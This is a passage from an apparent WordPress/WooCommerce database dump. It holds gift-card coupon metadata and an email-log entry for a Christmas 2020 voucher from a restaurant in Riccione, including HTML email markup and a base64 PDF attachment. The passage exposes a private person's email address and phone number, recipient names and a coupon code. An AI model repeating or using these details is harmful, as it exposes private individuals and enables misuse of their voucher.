underline;\">3408565027</a>=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09<br>matteo.sandri@bahlsen.it=09=09=09=09=09=\r\n=09=09</address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p style=3D=\r\n\"margin: 0 0 16px;\">Thanks for using www.ristorantesolymar.it!</p>=0A=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=09=09=09=09<=\r\n/td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=\r\n</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</tab=\r\nle>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=\r\n=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-=\r\n- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=\r\n=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padd=\r\ning: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=09<table border=\r\n=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=\r\n=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-radius: 6px; bord=\r\ner: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto,=\r\n Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: cent=\r\ner; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D=\r\n\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09=\r\n=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=\r\n=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK queued as 7d0bad3a-7203-4765-b7fb-ba0ac9027073\r\n'),(37398,3682,'discount_type','fixed_cart'),(37399,3682,'coupon_amount','100'),(37400,3682,'individual_use','no'),(37401,3682,'usage_limit','1'),(37402,3682,'usage_limit_per_user','0'),(37403,3682,'limit_usage_to_x_items',NULL),(37404,3682,'usage_count','0'),(37405,3682,'date_expires','1624320000'),(37406,3682,'free_shipping','yes'),(37407,3682,'exclude_sale_items','no'),(37408,3682,'apply_before_tax','no'),(37409,3682,'minimum_amount',''),(37410,3682,'maximum_amount',''),(37411,3682,'exclude_product_ids',''),(37412,3682,'exclude_product_categories',''),(37413,3682,'product_ids',''),(37414,3682,'product_categories','a:0:{}'),(37415,3682,'mwb_wgm_giftcard_coupon','3679'),(37416,3682,'mwb_wgm_giftcard_coupon_unique','online'),(37417,3682,'mwb_wgm_giftcard_coupon_product_id','548'),(37418,3682,'mwb_wgm_giftcard_coupon_mail_to','Laura Lucchi'),(37419,3679,'3679#386','a:1:{i:0;s:18:\"solymarcouponXVWYM\";}'),(37420,3683,'solution','All good, mail sent.'),(37421,3683,'success','1'),(37422,3683,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37423,3683,'to_header','matteo.sandri@bahlsen.it'),(37424,3683,'bcc_header','matteo.sandri@bahlsen.it'),(37425,3683,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37426,3683,'original_to','matteo.sandri@bahlsen.it'),(37427,3683,'original_subject','Sol Y Mar'),(37428,3683,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Buon Natale 2020</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Tom e Edo</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Laura Lucchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1608809224www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608809224solymarcouponXVWYM.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 22/06/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(37429,3683,'original_headers','[\"Bcc:matteo.sandri@bahlsen.it\"]'),(37430,3683,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\nnIZTNlPsbMoZvA825DXMyw3MNNr8B8Rn+ewKZW5kc3RyZWFtCmVuZG9iago0OCAwIG9iagox\r\nMjM2CmVuZG9iago0NiAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAvQ0lERm9udFR5\r\ncGUyCi9CYXNlRm9udCAvRHJvaWRBcmFiaWNLdWZpCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdp\r\nc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoSWRlbnRpdHkpIC9TdXBwbGVtZW50IDAgPj4KL0Zv\r\nbnREZXNjcmlwdG9yIDQ0IDAgUgovQ0lEVG9HSURNYXAgL0lkZW50aXR5Ci9XIFswIFs1OTUg\r\nMzM3IF0KXQo+PgplbmRvYmoKNDcgMCBvYmoKPDwgL0xlbmd0aCAzNjggPj4Kc3RyZWFtCi9D\r\nSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNvdXJjZSBiZWdpbgoxMiBkaWN0IGJlZ2luCmJlZ2lu\r\nY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKFVD\r\nUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYKL0NNYXBOYW1lIC9BZG9iZS1JZGVudGl0eS1VQ1Mg\r\nZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNlcmFuZ2UKPDAwMDA+IDxGRkZG\r\nPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJlZ2luYmZyYW5nZQo8MDAwMD4gPDAwMDA+IDwwMDAw\r\nPgo8MDAwMT4gPDAwMDE+IDwwMDIwPgplbmRiZnJhbmdlCmVuZGNtYXAKQ01hcE5hbWUgY3Vy\r\ncmVudGRpY3QgL0NNYXAgZGVmaW5lcmVzb3VyY2UgcG9wCmVuZAplbmQKCmVuZHN0cmVhbQpl\r\nbmRvYmoKNyAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAvVHlwZTAKL0Jhc2VGb250\r\nIC9Ecm9pZEFyYWJpY0t1ZmkKL0VuY29kaW5nIC9JZGVudGl0eS1ICi9EZXNjZW5kYW50Rm9u\r\ndHMgWzQ2IDAgUl0KL1RvVW5pY29kZSA0NyAwIFI+PgplbmRvYmoKNDkgMCBvYmoKPDwgL1R5\r\ncGUgL0ZvbnREZXNjcmlwdG9yCi9Gb250TmFtZSAvUVhCQUFBK05pbWJ1c1NhbnMtUmVndWxh\r\ncgovRmxhZ3MgNCAKL0ZvbnRCQm94IFstMjEwIC0yOTkgMTAzMiAxMDc1IF0KL0l0YWxpY0Fu\r\nZ2xlIDAgCi9Bc2NlbnQgNzI5IAovRGVzY2VudCAtMjcxIAovQ2FwSGVpZ2h0IDcyOSAKL1N0\r\nZW1WIDUwIAovRm9udEZpbGUyIDUwIDAgUgo+PgplbmRvYmoKNTAgMCBvYmoKPDwKL0xlbmd0\r\naDEgNDIzMiAKL0xlbmd0aCA1MyAwIFIKL0ZpbHRlciAvRmxhdGVEZWNvZGUKPj4Kc3RyZWFt\r\nCnicjVd5WFNXFr/nvvcSHLcGSKJ1SwgkQoyAMUlZFGSnQMAIAUVlDZsJQRYloFDHIm0pKLXi\r\n2lrpMpZSay12vjqjX9tP29qvttg2tY5/dHHamdbOjP26OQUec95L8Kvt/NGbd/POPe+8c889\r\ny+/eR4AQEkDuIwwhuWsilzW1vH4/ch7GXlrt9FRl3v3X75H+hpDpt2ocZZWO+Zl6Qmb8HXnm\r\nGmRMOysNImTmfByH1riaWzvXT/8Wx4k4vt/priiLPGtEzTPP4zjFVdbaQMJIKiGzAnCsqi9z\r\nOZoXOd7F8WJCaClhaCfsIRxh6UO0CCWyfHfYSJaBCcf4aKrRbsHsqVaQVWgliUQ1xtKr/Lfk\r\nLdYI+lJCjoqSLH1XmA1XyJDByUl2nPOSIKImEYQY1QqzxWy2LNfqzBatVoeXOkimXqZQKpQS\r\nqUSiU8tkagXSEukgHaw5Fm+Jg529lwDiY+KP1k4MnoPNVoc2j9I8rcPK74bLnQ8DPNwJK1bF\r\nHVi363lL6Ze2h03LjTCxHa7Nnb+yvX3FwjkwYacUuts8u9D1QLomR5lrbDSZS4happFJsGnQ\r\nDCSDFQqFUWFG8+TMtSGIyHYmVbfAUGRRZ15seWGOjo2eeCJ/V8kycFfQW+MXUlw5OpBHZpsH\r\nCCX3Tl5mg9k8IiMhOImgVC6qWyaoo1S6TCGuSiLVarUm5FFD00j7qlXbRpobRjqSgI7/I2Nz\r\nbgSA3tPX7wmH1kY2D3L3fdj94Ed7c3L2vt8Fc2DpkTjXYxVlB44BPHm4/PxTMcJqdhPCfIHz\r\n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\r\nbQplbmRvYmoKNTMgMCBvYmoKMzE3NgplbmRvYmoKNTEgMCBvYmoKPDwgL1R5cGUgL0ZvbnQK\r\nL1N1YnR5cGUgL0NJREZvbnRUeXBlMgovQmFzZUZvbnQgL05pbWJ1c1NhbnMtUmVndWxhcgov\r\nQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKElkZW50aXR5\r\nKSAvU3VwcGxlbWVudCAwID4+Ci9Gb250RGVzY3JpcHRvciA0OSAwIFIKL0NJRFRvR0lETWFw\r\nIC9JZGVudGl0eQovVyBbMCBbMjc2IDY2MiA1NTIgNTUyIDU1MiAyNzYgNzE2IDU1MiAyNzYg\r\nMjIwIDU1MiA1NTIgNTUyIDMzMCA2NjIgNDk2IDU1MiA0OTYgMjc2IDI3NiA1NTIgNTUyIDMz\r\nMCA2MDYgMzMwIDQ5NiAyMjAgNTUyIDgyNiAxODkgNzE2IDU1MiA0OTYgXQpdCj4+CmVuZG9i\r\nago1MiAwIG9iago8PCAvTGVuZ3RoIDU4OCA+PgpzdHJlYW0KL0NJREluaXQgL1Byb2NTZXQg\r\nZmluZHJlc291cmNlIGJlZ2luCjEyIGRpY3QgYmVnaW4KYmVnaW5jbWFwCi9DSURTeXN0ZW1J\r\nbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoVUNTKSAvU3VwcGxlbWVudCAw\r\nID4+IGRlZgovQ01hcE5hbWUgL0Fkb2JlLUlkZW50aXR5LVVDUyBkZWYKL0NNYXBUeXBlIDIg\r\nZGVmCjEgYmVnaW5jb2Rlc3BhY2VyYW5nZQo8MDAwMD4gPEZGRkY+CmVuZGNvZGVzcGFjZXJh\r\nbmdlCjIgYmVnaW5iZnJhbmdlCjwwMDAwPiA8MDAwMD4gPDAwMDA+CjwwMDAxPiA8MDAyMD4g\r\nWzwwMDQyPiA8MDA3NT4gPDAwNkY+IDwwMDZFPiA8MDAyMD4gPDAwNEU+IDwwMDYxPiA8MDA3\r\nND4gPDAwNkM+IDwwMDY1PiA8MDAzMj4gPDAwMzA+IDwwMDI4PiA8MDA1Mz4gPDAwNjM+IDww\r\nMDY0PiA8MDA3QT4gPDAwMkU+IDwwMDJGPiA8MDAzNj4gPDAwMzE+IDwwMDI5PiA8MDA1ND4g\r\nPDAwNzI+IDwwMDc2PiA8MDA2OT4gPDAwNjc+IDwwMDZEPiA8MDAyNz4gPDAwNDM+IDwwMDcw\r\nPiA8MDA3Mz4gXQplbmRiZnJhbmdlCmVuZGNtYXAKQ01hcE5hbWUgY3VycmVudGRpY3QgL0NN\r\nYXAgZGVmaW5lcmVzb3VyY2UgcG9wCmVuZAplbmQKCmVuZHN0cmVhbQplbmRvYmoKMTggMCBv\r\nYmoKPDwgL1R5cGUgL0ZvbnQKL1N1YnR5cGUgL1R5cGUwCi9CYXNlRm9udCAvTmltYnVzU2Fu\r\ncy1SZWd1bGFyCi9FbmNvZGluZyAvSWRlbnRpdHktSAovRGVzY2VuZGFudEZvbnRzIFs1MSAw\r\nIFJdCi9Ub1VuaWNvZGUgNTIgMCBSPj4KZW5kb2JqCjIgMCBvYmoKPDwKL1R5cGUgL1BhZ2Vz\r\nCi9LaWRzIApbCjUgMCBSCl0KL0NvdW50IDEKL1Byb2NTZXQgWy9QREYgL1RleHQgL0ltYWdl\r\nQiAvSW1hZ2VDXQo+PgplbmRvYmoKeHJlZgowIDU0CjAwMDAwMDAwMDAgNjU1MzUgZiAKMDAw\r\nMDAwMDAwOSAwMDAwMCBuIAowMDAwMjE2Mzc4IDAwMDAwIG4gCjAwMDAwMDAxNjMgMDAwMDAg\r\nbiAKMDAwMDAwMDI1OCAwMDAwMCBuIAowMDAwMTk3NjYxIDAwMDAwIG4gCjAwMDAyMDkyMDkg\r\nMDAwMDAgbiAKMDAwMDIxMTYwMSAwMDAwMCBuIAowMDAwMDAwMjk1IDAwMDAwIG4gCjAwMDAw\r\nMDE4OTEgMDAwMDAgbiAKMDAwMDAwMTkxMSAwMDAwMCBuIAowMDAwMDEzNjA5IDAwMDAwIG4g\r\nCjAwMDAwMTM2MzEgMDAwMDAgbiAKMDAwMDAxNTQwMyAwMDAwMCBuIAowMDAwMDE1NDI0IDAw\r\nMDAwIG4gCjAwMDAwMTczMTQgMDAwMDAgbiAKMDAwMDAxNzMzNSAwMDAwMCBuIAowMDAwMTk0\r\nNjc3IDAwMDAwIG4gCjAwMDAyMTYyMzMgMDAwMDAgbiAKMDAwMDIwMjQ1OSAwMDAwMCBuIAow\r\nMDAwMTk0NzAwIDAwMDAwIG4gCjAwMDAxOTY4ODMgMDAwMDAgbiAKMDAwMDE5NjkwNCAwMDAw\r\nMCBuIAowMDAwMTk2OTQ5IDAwMDAwIG4gCjAwMDAxOTcwMDEgMDAwMDAgbiAKMDAwMDE5NzE5\r\nNCAwMDAwMCBuIAowMDAwMTk3NDk0IDAwMDAwIG4gCjAwMDAxOTcyNTggMDAwMDAgbiAKMDAw\r\nMDE5NzM3MCAwMDAwMCBuIAowMDAwMTk3NTU3IDAwMDAwIG4gCjAwMDAxOTgwNjIgMDAwMDAg\r\nbiAKMDAwMDE5OTUxNCAwMDAwMCBuIAowMDAwMTk3NzgzIDAwMDAwIG4gCjAwMDAxOTgwMzUg\r\nMDAwMDAgbiAKMDAwMDE5OTUzNSAwMDAwMCBuIAowMDAwMTk5NzQ1IDAwMDAwIG4gCjAwMDAy\r\nMDE2NzAgMDAwMDAgbiAKMDAwMDIwMTk0NSAwMDAwMCBuIAowMDAwMjAxNjQ5IDAwMDAwIG4g\r\nCjAwMDAyMDI2MDEgMDAwMDAgbiAKMDAwMDIwMjg2MSAwMDAwMCBuIAowMDAwMjA4NDAzIDAw\r\nMDAwIG4gCjAwMDAyMDg2ODEgMDAwMDAgbiAKMDAwMDIwODM4MiAwMDAwMCBuIAowMDAwMjA5\r\nMzQ1IDAwMDAwIG4gCjAwMDAyMDk2MTAgMDAwMDAgbiAKMDAwMDIxMDk1OCAwMDAwMCBuIAow\r\nMDAwMjExMTgxIDAwMDAwIG4gCjAwMDAyMTA5MzcgMDAwMDAgbiAKMDAwMDIxMTc0MiAwMDAw\r\nMCBuIAowMDAwMjExOTU1IDAwMDAwIG4gCjAwMDAyMTUyNDMgMDAwMDAgbiAKMDAwMDIxNTU5\r\nMyAwMDAwMCBuIAowMDAwMjE1MjIyIDAwMDAwIG4gCnRyYWlsZXIKPDwKL1NpemUgNTQKL0lu\r\nZm8gMSAwIFIKL1Jvb3QgMjkgMCBSCj4+CnN0YXJ0eHJlZgoyMTY0NzYKJSVFT0YK\r\n--=_6454ddf5a88349c2c4bc09e217ffd268--\r\n.\r\n250 OK queued as 11aec717-c6d0-44c1-87b9-6f81a24ea3e0\r\n'),(37431,3684,'discount_type','fixed_cart'),(37432,3684,'coupon_amount','100'),(37433,3684,'individual_use','no'),(37434,3684,'usage_limit','1'),(37435,3684,'usage_limit_per_user','0'),(37436,3684,'limit_usage_to_x_items',NULL),(37437,3684,'usage_count','0'),(37438,3684,'date_expires','1624320000'),(37439,3684,'free_shipping','yes'),(37440,3684,'exclude_sale_items','no'),(37441,3684,'apply_before_tax','no'),(37442,3684,'minimum_amount',''),(37443,3684,'maximum_amount',''),(37444,3684,'exclude_product_ids',''),(37445,3684,'exclude_product_categories',''),(37446,3684,'product_ids',''),(37447,3684,'product_categories','a:0: